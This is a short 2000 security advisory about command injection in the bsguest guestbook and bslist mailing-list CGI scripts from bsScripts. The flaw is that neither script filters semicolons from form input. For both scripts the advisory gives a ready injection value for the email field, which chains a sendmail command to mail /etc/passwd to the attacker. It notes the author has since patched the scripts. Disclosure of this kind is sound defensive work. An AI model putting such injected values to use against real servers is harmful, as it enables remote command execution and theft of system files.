[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : BS Scripts Multiple CGI Vulnerabilities

Title: BS Scripts Multiple CGI Vulnerabilities
Released by: Elf (whitehatjoe@hotmail.com)
Date: 21st December 2000
Printable version: Click here
++++++++++++++++++++++++++++++++++++

BS Scripts Multiple CGI Vulnerabilities

Discovered by Elf (whitehatjoe@hotmail.com)

Greetz: 0x7f, CompSci, Dugnet

++++++++++++++++++++++++++++++++++++



Info



There are a couple of scripts from bsScripts 

(www.stanback.net) , that have holes in them 

because the author did not filter out ; from the form 

input.  The scripts that this affects is bsguest (a 

guestbook script) and bslist (a mailing list script).  

The hole allows anyone to execute commands on the 

server.  The author has been informed and the holes 

are now patched in the latest release.



-bsguest.cgi-



BSGuest does not filter out ; resulting in the ability for 

anyone to execute commands on the server.  The 

attacker just enters his email address 

as 'hacker@example.com;/usr/sbin/sendmail 

hacker@example.com < /etc/passwd', and then the 

server mails a confirmation letter along with the 

passwd file to the attacker.



-bslist.cgi-



BSList also doesn't filter out the ; and once again 

anybody can execute commands on the server.  This 

can be exploited by signing up for the mailing list with 

the email address of 



'hacker@example.com;/usr/sbin/sendmail 

hacker@example.com < /etc/passwd'



+++++++++++++++++++++++++++++

"It's funny how impossible dreams manifest" - 

Cypress Hill

EOF

+++++++++++++++++++++++++++++












(C) 1999-2000 All rights reserved.